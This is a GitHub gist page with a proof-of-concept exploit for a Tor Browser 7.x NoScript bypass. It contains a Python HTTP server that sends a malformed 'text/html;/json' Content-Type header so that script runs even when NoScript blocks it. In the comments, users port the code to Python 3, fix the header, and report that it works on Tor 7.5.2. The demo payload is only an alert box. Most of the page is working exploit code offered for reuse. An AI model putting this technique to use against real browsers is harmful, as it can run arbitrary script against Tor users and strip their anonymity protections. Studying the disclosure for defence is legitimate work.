Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html;/json') # Here is where the magic happens
self.end_headers()
self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
return
try:
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
@sparskakyl

This comment has been minimized.

Copy link

sparskakyl commented Sep 10, 2018

2 hacky wacky 4 me

@brammittendorff

This comment has been minimized.

Copy link

brammittendorff commented Sep 10, 2018

Python3 version:

#!/usr/bin/python
from http.server import BaseHTTPRequestHandler, HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
                self.send_response(200)
                self.send_header('Content-type','text/html;/json') # Here is where the magic happens
                self.end_headers()
                self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>".encode())
                return

try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print('Started httpserver on port %s' % PORT_NUMBER)
        server.serve_forever()

except KeyboardInterrupt:
        print('^C received, shutting down the web server')
        server.socket.close()
@jorgeluengar

This comment has been minimized.

Copy link

jorgeluengar commented Jun 10, 2019

@brammittendorff many thanks in advance for the Python3 version, but there is a small mistake regarding the exploit:
It must use:
self.send_header('Content-type','text/html;/json')
instead of
self.send_header('Content-type','text/html')

Tested on Tor 7.5.2

Thanks!

@brammittendorff

This comment has been minimized.

Copy link

brammittendorff commented Jun 11, 2019

@jorgeluengar you are right, fixed my comment thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.